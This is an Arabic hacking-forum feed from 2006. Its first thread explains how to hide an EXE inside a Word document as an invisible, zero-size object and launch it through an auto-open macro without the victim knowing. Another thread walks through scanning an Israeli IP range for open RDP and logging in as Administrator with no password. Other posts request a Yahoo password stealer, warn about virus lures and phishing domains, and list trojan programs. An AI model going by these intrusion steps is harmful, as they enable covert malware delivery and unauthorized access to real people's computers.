المهم انا بشرح كيف إضافة ملف exe في الورد كاعنصر كائن مخفي بالورد DOC ....و كيفيه تشغيله من دون معرفه الشخص.....: <br />
<br />
1- افتح الورد على مستند جديد . <br />
2- Insert ادراج. <br />
3- Object كائن. <br />
4- و لما تطلع القائمه اختار منها Package حزمه. <br />
5- الان يفتح معاك object Packager او معد الحزم. <br />
6- اختار file ملف. <br />
7- و بعدين import استيراد. <br />
8- الان اختار اي ملف exe تبي تنزله في للمستند. <br />
9- و بعد ما تختاره راح يطلع الملف عندك في مربع معد الحزم object packager <br />
10- اذهب الى ملف file و اختار تحديث update. <br />
<br />
الان راح تشوف ملف ال exe موجود في مستند الورد ...كا كائن ملصق بالمستند ...لو تطق عليه دبل كلك راح يشتغل عادي ....لكن انت تبي الشخص ما يشوفه و يشتغل اوتوماتك: <br />
<br />
1- طيب حدد الملف او خله عنصر نشط. <br />
2- من ثم اذهب الى Format ثم Object <br />
3- إختار بالزر اليمين ثم إختار Format Object <br />
4- و من ثم اذهب الى size او الحجم و خله صفر. <br />
5- بهذه الخطوات لا تستطيع أن تشاهد الملف المرفق مع ملف الوورد. <br />
<br />
الحين يبقى اضافه اوامر برمجيه بالمستند لتشغيل الملف عند فتح ملف الوورد: <br />
1- أدوات tools <br />
2- ماكرو macro <br />
3- Microsoft Visual Basic Editor <br />
4- تنفتح صفحة الإستعراض المشروع. <br />
5- أضغط مرتين على this ******** <br />
6- و من ثم في القائمه المسندله فوق صفح العمل غير الخيار من Generalالى ******** <br />
7- و القائمه المسندله الاخر من new الى open <br />
8- و اكتب الكود الذي يقوم بتشغيل object الكائن المرفق بالمستند ...يجب كتابته بين <br />
<br />
Private Sub ******** Open () <br />
** هناااااااااااااا تكتب الكود الذي ينفذ ال object* <br />
End Sub <br />
<br />
لكتابة الكود لا بد أن تكون عندك خلفية مبرمجية <br />
<br />
ممكن يرسل لك ملف EXE داخل ملف DOC ويكون فيه Virus يعدم الدنيا لكن ابي ازيدك من الشعر بيت، لان ممكن ملف الـ DOC يكون فيه Virus منشى من لغة VBA ففي بعض الاحيان لما تفتح ملفات DOC تطلع لك رسالة تقول لك ان الملف هذا يحتوي على Macros ومع زرين Yes و No هل تبغى تفتحها؟؟؟؟ وهذا على مسؤوليتك انت.. <br />
<br />
لذلك يتضح أن ملفات الوورد ليست أمنه ولكنها أشد خطورة لعدم معرفة الناس بخطورتها لانه عندما تسأل أي أحد يقول لك لاتستقبل برامج به EXE. ولكن مكمن الخطر في الوورد او الصور أشد إذا أراد أحد الأذية ولكن أقول الحذر الحذر<br />
<br />
<br />
<br />
الموضوووووووع منقوول</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29262</guid>
		</item>
		<item>
			<title>اخترق سيرفر اجهزة من دون باتشات</title>
			<link>https://kwety.net/vb/showthread.php?t=29261&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 13:28:00 GMT</pubDate>
			<description>بسم الله الرحمن الرحيم 
السلام عليكم ورحمة الله وبركاته 
كيفكم جميعاً يا اعضاء ومشرفين وإدارة منتديات الشبكةالكويتية الحلوين إن شاء الله كلكم بخير 
ندخل في صلب الموضوع 
اليوم جايب لكم طريقة اختراق سيرفرات اجهزة بطريقة سهله جداً 
قبل ما نبدأ الشرح : 
اقسم بالله اني لن استخدم ما تعلمته على العرب 
بسم الله نبدأ 
المتطلبات : 
1- برنامج Remote Desktop Connection 
برنامج ريموت متواجد في وندوز أكس بي .. تشوفه في 
Start - Programs -Accessories - Communications - Remote Desktop Connection 
او للجهزة العربي 
ابدأ - برامج -البرامج الملحقة - اتصالات -الاتصال بسطح المكتب من البعيد 
البرنامج الثاني : 
2- برنامج Scan و أنا أستخدم برنامج Super Scan 
أولاً يجب عليك أضافة Port Remote Desktop Connection وهو 3389 في برنامج السوبر سكان لأنه ( Port جديد ولا يوجد في البرنامج نفسه ) . 
طريقة أضافة الــport كالآتي : 
أفتح برنامج السوبر سكان و أضغط على Port list setup . 
كما في الصوره : 
صورة: http://www.kwety.net/kwety1/q89/maroc 1.jpg 

- الـــPort في البرنامج 
2- تضيف وصف للبورت .. 
3- تضغط على Add لأضافة الـPort في البرنامج . 
4- تقوم بالضغط على Ok كما في الصوره 
بعد الضغط على اوكي ok راح تطلع لك مسج مضمونها ( لقد تمت تغيرات في اللسته ؟ تبي تسوي عملة حفظ لهذي العمليه ) . أضغط Yes 
بعد حفظ البورت الخاص بإتصال سطح المكتب أرجع للبرنامج من جديد على الواجهة الرئيسيه 
صورة: http://www.kwety.net/kwety1/q89/maroc2.jpg 

1-ضع نطاق آي بي أسرائيل ؟ و أنا أخترت الآي بي : 213.8.1.1 - 213.8.255.255 
2-ضع رقم الـ Port وهو 3389 
3-أبدأ البحث 
صورة: http://www.kwety.net/kwety1/q89/maroc3.jpg 

العثور على ضحية 
انسخ cope الاي بي اللي حصلنا فيه البورت مفتوح و تحطه في برنامج Remote Desktop 
Connection 
صورة: http://www.kwety.net/kwety1/q89/maroc4.bmp 

1- الاي بي اللي حصلنا فيه البورت مفتوح 
2- اسم السيرفر وعاده يكون administrator 
3- باسورد السيرفر 
صورة: http://www.kwety.net/kwety1/q89/maroc5.jpg 

الحين جينا للمهم 
الكمبيوتر يطلب منا باسورد للدخول على الجهاز !! 
لكن من وين نحصل الباسورد !! 
أنا أقول لك ؟ هنالك في عملية الفورمات نقطه !! أنك تضع على يوزر Administrator باسورد ؟ لكن أغلب الناس لا تضع باسورد على يوزر Administrator فيكون الجهاز سبيل للآخرين !! 
قم بوضع في نافذة دخول جهاز الضحية اليوزر : administrator 
الباسورد : لا شيء . 
و أضغط أنتر و توكل على الله 
صورة: http://www.kwety.net/kwety1/q89/maroc6.jpg 

حلو دخلنا على السيرفر من دون باسورد توكل على الله 
4- اتصال 
صورة: http://www.kwety.net/kwety1/q89/maroc7.jpg </description>
			<content:encoded><![CDATA[<div>بسم الله الرحمن الرحيم <br />
السلام عليكم ورحمة الله وبركاته <br />
كيفكم جميعاً يا اعضاء ومشرفين وإدارة منتديات الشبكةالكويتية الحلوين إن شاء الله كلكم بخير <br />
ندخل في صلب الموضوع <br />
اليوم جايب لكم طريقة اختراق سيرفرات اجهزة بطريقة سهله جداً <br />
قبل ما نبدأ الشرح : <br />
اقسم بالله اني لن استخدم ما تعلمته على العرب <br />
بسم الله نبدأ <br />
المتطلبات : <br />
1- برنامج Remote Desktop Connection <br />
برنامج ريموت متواجد في وندوز أكس بي .. تشوفه في <br />
Start - Programs -Accessories - Communications - Remote Desktop Connection <br />
او للجهزة العربي <br />
ابدأ - برامج -البرامج الملحقة - اتصالات -الاتصال بسطح المكتب من البعيد <br />
البرنامج الثاني : <br />
2- برنامج Scan و أنا أستخدم برنامج Super Scan <br />
أولاً يجب عليك أضافة Port Remote Desktop Connection وهو 3389 في برنامج السوبر سكان لأنه ( Port جديد ولا يوجد في البرنامج نفسه ) . <br />
طريقة أضافة الــport كالآتي : <br />
أفتح برنامج السوبر سكان و أضغط على Port list setup . <br />
كما في الصوره : <br />
<img src="http://www.kwety.net/kwety1/q89/maroc 1.jpg" border="0" alt="" /><br />
<br />
- الـــPort في البرنامج <br />
2- تضيف وصف للبورت .. <br />
3- تضغط على Add لأضافة الـPort في البرنامج . <br />
4- تقوم بالضغط على Ok كما في الصوره <br />
بعد الضغط على اوكي ok راح تطلع لك مسج مضمونها ( لقد تمت تغيرات في اللسته ؟ تبي تسوي عملة حفظ لهذي العمليه ) . أضغط Yes <br />
بعد حفظ البورت الخاص بإتصال سطح المكتب أرجع للبرنامج من جديد على الواجهة الرئيسيه <br />
<img src="http://www.kwety.net/kwety1/q89/maroc2.jpg" border="0" alt="" /><br />
<br />
1-ضع نطاق آي بي أسرائيل ؟ و أنا أخترت الآي بي : 213.8.1.1 - 213.8.255.255 <br />
2-ضع رقم الـ Port وهو 3389 <br />
3-أبدأ البحث <br />
<img src="http://www.kwety.net/kwety1/q89/maroc3.jpg" border="0" alt="" /><br />
<br />
العثور على ضحية <br />
انسخ cope الاي بي اللي حصلنا فيه البورت مفتوح و تحطه في برنامج Remote Desktop <br />
Connection <br />
<img src="http://www.kwety.net/kwety1/q89/maroc4.bmp" border="0" alt="" /><br />
<br />
1- الاي بي اللي حصلنا فيه البورت مفتوح <br />
2- اسم السيرفر وعاده يكون administrator <br />
3- باسورد السيرفر <br />
<img src="http://www.kwety.net/kwety1/q89/maroc5.jpg" border="0" alt="" /><br />
<br />
الحين جينا للمهم <br />
الكمبيوتر يطلب منا باسورد للدخول على الجهاز !! <br />
لكن من وين نحصل الباسورد !! <br />
أنا أقول لك ؟ هنالك في عملية الفورمات نقطه !! أنك تضع على يوزر Administrator باسورد ؟ لكن أغلب الناس لا تضع باسورد على يوزر Administrator فيكون الجهاز سبيل للآخرين !! <br />
قم بوضع في نافذة دخول جهاز الضحية اليوزر : administrator <br />
الباسورد : لا شيء . <br />
و أضغط أنتر و توكل على الله <br />
<img src="http://www.kwety.net/kwety1/q89/maroc6.jpg" border="0" alt="" /><br />
<br />
حلو دخلنا على السيرفر من دون باسورد توكل على الله <br />
4- اتصال <br />
<img src="http://www.kwety.net/kwety1/q89/maroc7.jpg" border="0" alt="" /></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29261</guid>
		</item>
		<item>
			<title>ارجوكم ارجوكم ساعدوني</title>
			<link>https://kwety.net/vb/showthread.php?t=28907&amp;goto=newpost</link>
			<pubDate>Fri, 01 Sep 2006 07:31:26 GMT</pubDate>
			<description>السلام عليكم
أخواني أنا بحثت كثيرا عن برنامج هكر سرقة باسورد أيمل الياهو
ووجدت برامج كثيرة وأنا رجو منكم إعطائي هذا البرنامج مع الشرح بلتفطل الممل
علما آنا لا استخدم هذا البرنامج الأغراض غير شرعية
وأتمنى من مشرفين المنتدى أن يساعدوني باعطئي برنامج مضمون 100%</description>
			<content:encoded><![CDATA[<div>السلام عليكم<br />
أخواني أنا بحثت كثيرا عن برنامج هكر سرقة باسورد أيمل الياهو<br />
ووجدت برامج كثيرة وأنا رجو منكم إعطائي هذا البرنامج مع الشرح بلتفطل الممل<br />
علما آنا لا استخدم هذا البرنامج الأغراض غير شرعية<br />
وأتمنى من مشرفين المنتدى أن يساعدوني باعطئي برنامج مضمون 100%</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>اسد بابل</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=28907</guid>
		</item>
		<item>
			<title>خبر عاجل انتحار ...إنتحار بن لادن (صور)... لا إله إلا الله</title>
			<link>https://kwety.net/vb/showthread.php?t=28771&amp;goto=newpost</link>
			<pubDate>Wed, 30 Aug 2006 11:03:45 GMT</pubDate>
			<description><![CDATA[--------------------------------------------------------------------------------

قراصنة الكمبيوتر ينشرون فيروسا يندس في رسائل الكترونية بدعوى عرض 
صور عن انتحار بن لادن من اجل التحكم بأجهزة المستقبلين. 
حذرت الجمعية مؤسسة "سوفوس" التي تحارب الفيروسات الالكترونية، من رسائل الكترونية 

تدعي انها تعرض صورا لانتحار اسامة بن لادن، اذ ان هذه الرسائل تحتوي على فيروس اشبه ب"حصان طروادة" 
وهو يخول قراصنة شبكة الانترنت من التحكم عن بعد 
بجهاز الكمبيوتر المصاب بالفيروس . 

واعلنت "سوفوس" التي اعطت للفيروس اسم "هاك ارمي"، ان 

"مستخدمي اجهزة الكمبيوتر الذين يقعون ضحية خدعة بن لادن هذه قد يمكنون حصان طروادة من مهاجمة جهازهم". 

واشارت سوفوس "ان الاف الرسائل الالكترونية قد بعثت عبر الانترنت مدعية ان صحافيين 
من شبكة +سي ان ان+ اكتشفوا هذا الاسبوع جثة بن لادن مشنوقا". 

وبحسب سوفوس، تقود هذه الرسائل الى موقع على الانترنت يفترض منه تنزيل الصور، 
ولكن في الواقع لا يتعدى الامر كونه خدعة يتسلل من خلالها الفيروس الى جهاز الكمبيوتر. 

وقال غراهام كلولي كبير مستشاري شركة سوفوس "ان قراصنة الشبكة 
ومبرمجي الفيروسات يحاولون بكل الوسائل جذب انتباه الناس ..



منقوووووووووووووووول]]></description>
			<content:encoded><![CDATA[<div>--------------------------------------------------------------------------------<br />
<br />
قراصنة الكمبيوتر ينشرون فيروسا يندس في رسائل الكترونية بدعوى عرض <br />
صور عن انتحار بن لادن من اجل التحكم بأجهزة المستقبلين. <br />
حذرت الجمعية مؤسسة &quot;سوفوس&quot; التي تحارب الفيروسات الالكترونية، من رسائل الكترونية <br />
<br />
تدعي انها تعرض صورا لانتحار اسامة بن لادن، اذ ان هذه الرسائل تحتوي على فيروس اشبه ب&quot;حصان طروادة&quot; <br />
وهو يخول قراصنة شبكة الانترنت من التحكم عن بعد <br />
بجهاز الكمبيوتر المصاب بالفيروس . <br />
<br />
واعلنت &quot;سوفوس&quot; التي اعطت للفيروس اسم &quot;هاك ارمي&quot;، ان <br />
<br />
&quot;مستخدمي اجهزة الكمبيوتر الذين يقعون ضحية خدعة بن لادن هذه قد يمكنون حصان طروادة من مهاجمة جهازهم&quot;. <br />
<br />
واشارت سوفوس &quot;ان الاف الرسائل الالكترونية قد بعثت عبر الانترنت مدعية ان صحافيين <br />
من شبكة +سي ان ان+ اكتشفوا هذا الاسبوع جثة بن لادن مشنوقا&quot;. <br />
<br />
وبحسب سوفوس، تقود هذه الرسائل الى موقع على الانترنت يفترض منه تنزيل الصور، <br />
ولكن في الواقع لا يتعدى الامر كونه خدعة يتسلل من خلالها الفيروس الى جهاز الكمبيوتر. <br />
<br />
وقال غراهام كلولي كبير مستشاري شركة سوفوس &quot;ان قراصنة الشبكة <br />
ومبرمجي الفيروسات يحاولون بكل الوسائل جذب انتباه الناس ..<br />
<br />
<br />
<br />
منقوووووووووووووووول</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=28771</guid>
		</item>
		<item>
			<title>طريقة اسرائيلية جديدةلسرقة ايميلات الهوت ميل</title>
			<link>https://kwety.net/vb/showthread.php?t=28770&amp;goto=newpost</link>
			<pubDate>Wed, 30 Aug 2006 11:01:07 GMT</pubDate>
			<description>السلام عليــكم ....
الجميــع يعلــم أنــه ليس للإسلام والمسلمين من عدو إلا عدو واحد.
لا يتوانون عن إلحاق الضرر بالمسلمين حتى بأقذر الطرق.
خلال الأيام الماضيــه انتشرت طريقه لسرقة الإيميلات تقوم على طريقة دنيئه وهمية الهدف منها عمل تسجيل الدخول للهوتميل .. Spoofing
وتم إنزال عدة مواضيع وهميه في عدة مواقع عربية عن مواضيــع يمكنك متابعتها بالذهاب إلا هـذا الرابط
http://ww.h0tmail.com/ (انا نقصت من أحرف الــ w من شان لايتم الظغط عليها عن طريق الخطأ
بدل من
http://www.hotmail.com/ 
بدون أن تشعر بأي فارق.
الفرق البيسط هو ان الصفرالإنجليزي بدل الحرف الإنجليزي o
والقليل الذين يدققون في ذلك .... 
طبعا المخترقون لم يفلعوا شي أبدا سوى وضع كود في هذه المواقع بحيث يعمل اللازم بدون ان تشعر بشيء 
المخترقون اسرائليون مع مجموعه من عرب اسرائيل. وهم مجموعة مراهقين تسمي نفسها Kill arabs 
وهم الآن يتفاخرون بأنهم سرقوا ما يقارب 4000 ايميل في يومين او ثلاثة 
ليس لهم موقع رسمي ولكن يتواجدون في Hackerz clip
والاختراق تم بطريقة بسيطة PHP Shell 
المهم انتبهوا للوصلة كما أخبرتكم. فالفرق يكون بدل حرف الــ o يكون رقم زيروو.</description>
			<content:encoded><![CDATA[<div>السلام عليــكم ....<br />
الجميــع يعلــم أنــه ليس للإسلام والمسلمين من عدو إلا عدو واحد.<br />
لا يتوانون عن إلحاق الضرر بالمسلمين حتى بأقذر الطرق.<br />
خلال الأيام الماضيــه انتشرت طريقه لسرقة الإيميلات تقوم على طريقة دنيئه وهمية الهدف منها عمل تسجيل الدخول للهوتميل .. Spoofing<br />
وتم إنزال عدة مواضيع وهميه في عدة مواقع عربية عن مواضيــع يمكنك متابعتها بالذهاب إلا هـذا الرابط<br />
<a href="http://ww.h0tmail.com/" target="_blank">http://ww.h0tmail.com/</a> (انا نقصت من أحرف الــ w من شان لايتم الظغط عليها عن طريق الخطأ<br />
بدل من<br />
<a href="http://www.hotmail.com/" target="_blank">http://www.hotmail.com/</a> <br />
بدون أن تشعر بأي فارق.<br />
الفرق البيسط هو ان الصفرالإنجليزي بدل الحرف الإنجليزي o<br />
والقليل الذين يدققون في ذلك .... <br />
طبعا المخترقون لم يفلعوا شي أبدا سوى وضع كود في هذه المواقع بحيث يعمل اللازم بدون ان تشعر بشيء <br />
المخترقون اسرائليون مع مجموعه من عرب اسرائيل. وهم مجموعة مراهقين تسمي نفسها Kill arabs <br />
وهم الآن يتفاخرون بأنهم سرقوا ما يقارب 4000 ايميل في يومين او ثلاثة <br />
ليس لهم موقع رسمي ولكن يتواجدون في Hackerz clip<br />
والاختراق تم بطريقة بسيطة PHP Shell <br />
المهم انتبهوا للوصلة كما أخبرتكم. فالفرق يكون بدل حرف الــ o يكون رقم زيروو.</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=28770</guid>
		</item>
		<item>
			<title><![CDATA[احذروا من "مايكل جاكسون ينتحر"]]></title>
			<link>https://kwety.net/vb/showthread.php?t=28591&amp;goto=newpost</link>
			<pubDate>Mon, 28 Aug 2006 02:56:41 GMT</pubDate>
			<description><![CDATA[[GRADE="FF1493 32CD32 008000 800080"]"مايكل جاكسون ينتحر "


بليــــــــــــــــــــز انتبهوا....

إذا وصلك إيميل بهذا العنوان "Michael Jackson has made a suicide" أي "مايكل جاكسون ينتحر" فامسح الرسالة مباشرة ولا تفتحها لأن هذا هو أحدث فيروس عبر الإيميلات !!

الإيميل المكتوب بلغة إنجليزية ركيكة يزعم أن مايكل جاكسون الفنان الأكثر إثارة للجدل في العالم قد انتحر في مزرعته الشهيرة "Neverland" مع رابط يطلب منك فيه مرسل الرسالة الضغط عليه لمشاهدته !!

الفايروس عبارة عن شكل جديد من أشكال الفايروسات المسماة "حصان طروادة أو "Trojan Horse" 

اتمنى تستفيدوا من الموضوع....[/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">[GRADE=&quot;FF1493 32CD32 008000 800080&quot;]&quot;مايكل جاكسون ينتحر &quot;<br />
<br />
<br />
بليــــــــــــــــــــز انتبهوا....<br />
<br />
إذا وصلك إيميل بهذا العنوان &quot;Michael Jackson has made a suicide&quot; أي &quot;مايكل جاكسون ينتحر&quot; فامسح الرسالة مباشرة ولا تفتحها لأن هذا هو أحدث فيروس عبر الإيميلات !!<br />
<br />
الإيميل المكتوب بلغة إنجليزية ركيكة يزعم أن مايكل جاكسون الفنان الأكثر إثارة للجدل في العالم قد انتحر في مزرعته الشهيرة &quot;Neverland&quot; مع رابط يطلب منك فيه مرسل الرسالة الضغط عليه لمشاهدته !!<br />
<br />
الفايروس عبارة عن شكل جديد من أشكال الفايروسات المسماة &quot;حصان طروادة أو &quot;Trojan Horse&quot; <br />
<br />
اتمنى تستفيدوا من الموضوع....[/GRADE]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>أنـــــوسـه ^_^</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=28591</guid>
		</item>
		<item>
			<title>عالم الهاكر كيف تحمي نفسك منه؟؟؟؟ (( أرجو التثبـيت ))</title>
			<link>https://kwety.net/vb/showthread.php?t=28092&amp;goto=newpost</link>
			<pubDate>Mon, 21 Aug 2006 02:55:10 GMT</pubDate>
			<description>ما هي عملية الهاكينج أو التجسس ؟ 
من هم الهاكرز ؟ 
ما هي الأشياء التي تساعدهم على اختراق جهازك ؟ 
كيف يتمكن الهاكر من الدخول إلى جهازك ؟ 
كيف يتمكن الهاكر من الدخول إلى جهاز كمبيوتر بعينه ؟ 
ما هو رقم الآي بي أدرس ؟ 
كيف يصاب جهازك بملف الباتش أو التروجان أو حتى الفيروسات ؟ 
كيف يختار الهاكر الجهاز الذي يود اختراقه ؟ 
ما هي أشهر برامج الهاكرز ؟ 
كيف تعرف إذا كان جهازك مخترقاً أم لا ؟ 
ما هي أهم الاحتياطات التي يجب اتخاذها للحماية من الهاكرز ؟ 
ما هي أهم الأشياء التي يبحث عنها الهاكرز ؟ 
ما هي أشهر طريقة للكشف عن ملفات التجسس ؟ 
مواقف مع الهاكرز .. 

تسمى باللغة الإنجليزية (Haking) .. وتسمى باللغة العربية عملية التجسس أو الاختراق .. 
حيث يقوم أحد الأشخاص الغير مصرح لهم بالدخول إلى نظام التشغيل في جهازك بطريقة غير شرعية ولأغراض غير سوية مثل التجسس أو السرقة أو التخريب حيث يتاح للشخص المتجسس (الهاكر) أن ينقل أو يمسح أو يضيف ملفات أو برامج كما أنه بإمكانه أن يتحكم في نظام التشغيل فيقوم بإصدار أوامر مثل إعطاء أمر الطباعة أو التصوير أو التخزين .. 


من هم الهاكرز ؟ 
هم الأشخاص الذين يخترقون جهازك فيستطيعون مشاهدة ما به من ملفات أو سرقتها أو تدمير جهازك أو التلصص ومشاهدة ما تفعله على شبكة الإنترنت .. 

ما هي الأشياء التي تساعدهم على اختراق جهازك ؟ 
1- وجود ملف باتش أو تروجان 
لا يستطيع الهاكر الدخول إلى جهازك إلا مع وجود ملف يسمى ( patch ) أو (trojan ) في جهازك وهذه الملفات هي التي يستطيع الهاكر بواسطتها الدخول إلى جهازك الشخصي حيث يستخدم الهاكر أحد برامج التجسس التي ترتبط مع ملف الباتش الذي يعمل ك (ريسيفر) يستطيع أن يضع له الهاكر ( إسم مستخدم ) و ( رمز سري ) تخوله أن يكون هو الشخص الوحيد الذي يستطيع الدخول إلى جهازك وكذلك يستطيع أن يجعل جهازك مفتوحاً فيستطيع أي هاكر أن يدخل إلى جهازك !! 

2- الاتصال بشبكة الإنترنت 

لا يستطيع الهاكر أن يدخل إلى جهازك إلا إذا كنت متصلاً بشبكة الإنترنت أما إذا كان جهازك غير متصل بشبكة الإنترنت أو أي شبكة أخرى فمن المستحيل أن يدخل أحد إلى جهازك سواك !! 
ولذللك إذا أحسست بوجود هاكر في جهازك فسارع إلى قطع الاتصال بخط الإنترنت بسرعة حتى تمنع الهاكر من مواصلة العبث والتلصص في جهازك .. 


3- برنامج التجسس 

حتى يتمكن الهاكر العادي من اختراق جهازك لابد أن يتوافر معه برنامج يساعده على الاختراق ! 

ومن أشهر برامج الهاكرز هذه البرامج : 

Web Cracker 4 
Net Buster 
NetBus Haxporg 
Net Bus 1.7 
Girl Friend 
BusScong 
BO Client and Server 
Hackers Utility 
كيف يتمكن الهاكر من الدخول إلى جهازك ؟ 
عندما يتعرض جهاز الكمبيوتر للإصابة بملف التجسس وهو ( الباتش أو التروجان ) فإنه على الفور يقوم بفتح بورت ( port ) أو منفذ داخل جهازك فيستطيع كل من لديه برنامج تجسس أن يقتحم جهازك من خلال هذا الملف الذي يقوم بفتح منطقة أشبه بالنافذة السرية التي يدخل منها اللصوص وهم الهاكرز !! 

كيف يتمكن الهاكر من الدخول إلى جهاز كمبيوتر بعينه ؟ 
لا يستطيع الهاكر أن يخترق جهاز كمبيوتر بعينه إلا إذا توافرت عدة شروط أساسية وهي : 
1- إذا كان هذا الكمبيوتر يحوي ملف التجسس ( الباتش ) . 

2- إذا كان الهاكر يعرف رقم الآي بي أدرس الخاص بهذا الشخص .. 

وطبعاً لابد من وجود الشروط الأخرى وهي اتصال الضحية بالإنترنت ومعرفة الهاكر بكيفية استخدام برنامج التجسس والاختراق من خلاله ! 

بمعنى آخر إذا كان جهاز الكمبيوتر سليماً ولا يحوي أي ملفات باتش فمن المستحيل أن يدخل عليه أي هاكر عادي حتى لو كان يعرف رقم الآي بي أدرس ما عدا المحترفين فقط وهم قادرون على الدخول بأية طريقة وتحت أي مانع ولديهم طرقهم السرية في الولوج إلى مختلف الأنظمة !! 

وإذا كان الهاكر لا يعرف رقم الآي بي أدرس الخاص بك فإنه لن يستطيع الدخول إلى جهازك حتى لو كان جهازك يحوي ملف الباتش ! 


ما هو رقم الآي بي أدرس ؟ 
هو العنوان الخاص بكل مستخدم لشبكة الإنترنت أي أنه الرقم الذي يُعَّرف مكان الكمبيوتر أثناء تصفح شبكة الإنترنت وهو يتكون من 4 أرقام وكل جزء منها يشير إلى عنوان معين فأحدها يشير إلى عنوان البلد والتالي يشير إلى عنوان الشركة الموزعة والثالث إلى المؤسسة المستخدمة والرابع هو المستخدم .. 
ورقم الآي بي متغير وغير ثابت فهو يتغير مع كل دخول إلى الإنترنت .. بمعنى آخر لنفرض أنك اتصلت بالانترنت ونظرت إلى رقم الآى بي الخاص بك فوجدت أنه : 
212.123.123.200 

ثم خرجت من الانترنت أو أقفلت الاتصال ثم عاودت الاتصال بعد عدة دقائق فإن الرقم يتغير ليصبح كالتالي : 

212.123.123.366 

لاحظ التغير في الأرقام الأخيرة : الرقم 200 أصبح 366 . 

ولذلك ينصح بعدم استخدام بعرض برامج المحادثة مثل (الآيسكيو ICQ) لأنه يقوم بإظهار رقم الآي بي بشكل دائم حتى مع إخفائه فيتمكن الهاكر من استخدامه في الدخول إلى جهاز الشخص المطلوب مع توافر شرط وهو أن يحتوي كمبيوتر هذا الشخص على منفذ أو ملف تجسس ( باتش ) !! 


كيف يصاب جهازك بملف الباتش أو التروجان أو حتى الفيروسات ؟ 
الطريقة الأولى : 
أن يصلك ملف التجسس من خلال شخص عبر المحادثة أو ( الشات ) وهي أن يرسل أحد الهاكر لك صورة أو ملف يحتوي على الباتش أو التروجان ! 
ولابد أن تعلم صديقي العزيز أنه بإمكان الهاكر أن يغرز الباتش في صورة أو ملف فلا تستطيع معرفته إلا باستخدام برنامج كشف الباتش أو الفيروسات حيث تشاهد الصورة أو الملف بشكل طبيعي ولا تعلم أنه يحتوي على باتش أو فيروس ربما يجعل جهازك عبارة عن شوارع يدخلها الهاكر والمتطفلون ! 

الطريقة الثانية : 

أن يصلك الباتش من خلال رسالة عبر البريد الإلكتروني لا تعلم مصدر الرسالة ولا تعلم ماهية الشخص المرسل فتقوم بتنزيل الملف المرفق مع الرسالة ومن ثم فتحه وأنت لا تعلم أنه سيجعل الجميع يدخلون إلى جهازك ويتطفلون عليك .. 

الطريقة الثالثة : 

إنزال برامج أو ملفات من مواقع مشبوهة مثل المواقع الجنسية أو المواقع التي تساعد على تعليم التجسس ! 

الطريقة الرابعة : 

الدخول إلى مواقع مشبوهة مثل المواقع الجنسية حيث أنه بمجرد دخولك إلى الموقع فإنه يتم تنزيل الملف في جهازك بواسطة كوكيز لا تدري عنها !! 
حيث يقوم أصحاب مثل هذه المواقع بتفخيخ الصفحات فعندما يرغب أحد الزوار في الدخول إلى هذه الصفحات تقوم صفحات الموقع بإصدار أمر بتنزيل ملف التجسس في جهازك ! 


كيف يختار الهاكر الجهاز الذي يود اختراقه ؟ 
بشكل عام لا يستطيع الهاكر العادي من اختيار كمبيوتر بعينه لاختراقه إلا إذا كان يعرف رقم الآي بي أدرس الخاص به كما ذكرنا سابقاً فإنه يقوم بإدخال رقم الآي بي أدرس الخاص بكمبيوتر الضحية في برنامج التجسس ومن ثم إصدار أمر الدخول إلى الجهاز المطلوب !! 
وأغلب المخترقين يقومون باستخدام برنامج مثل ( IP Scan ) أو كاشف رقم الآي بي وهو برنامج يقوم الهاكر باستخدامه للحصول على أرقام الآي بي التي تتعلق بالأجهزة المضروبة التي تحتوي على ملف التجسس ( الباتش ) ! 

يتم تشغيل البرنامج ثم يقوم المخترق بوضع أرقام آي بي افتراضيه .. أي أنه يقوم بوضع رقمين مختلفين فيطلب من الجهاز البحث بينهما فمثلاً يختار هذين الرقمين : 

212.224.123.10 

212.224.123.100 

لاحظ آخر رقمين وهما : 10 و 100 

فيطلب منه البحث عن كمبيوتر يحوي منفذ ( كمبيوتر مضروب ) بين أجهزة الكمبيوتر الموجودة بين رقمي الآي بي أدرس التاليين : 212.224.123.10 و 212.224.123.100 
وهي الأجهزة التي طلب منه الهاكر البحث بينها ! 

بعدها يقوم البرنامج بإعطائه رقم الآي بي الخاص بأي كمبيوتر مضروب يقع ضمن النطاق الذي تم تحديده مثل : 

212.224.123.50 

212.224.123.98 

212.224.123.33 

212.224.123.47 

فيخبره أن هذه هي أرقام الآي بي الخاصة بالأجهزة المضروبة التي تحوي منافذ أو ملفات تجسس فيستطيع الهاكر بعدها من أخذ رقم الآي بي ووضعه في برنامج التجسس ومن ثم الدخول إلى الأجهزة المضروبة ! 

ما هي أشهر برامج الهاكرز ؟ 

netbus1.70 
من أقدم البرامج في ساحة الاختراق بالسيرفرات وهو الأكثر شيوعا بين مستخدمي المايكروسوفت شات وهو برنامج به العديد من الإمكانيات التي تمكن الهاكر من التحكم بجهاز الضحية وتوجد نسخ مختلفة أكثر حداثة من النت باس وكل نسخى منها أكثر تطوراً من الأخرى .. 

SUB 7 
برنامج ممتاز وغني عن التعريف .. تستطيع التحكم وتنسيق السيرفر ليعمل كيفما تشاء سواء من تغيير شكل او طريقة عمل وهو ممتاز في مجال الاختراق بالبرامج .. 

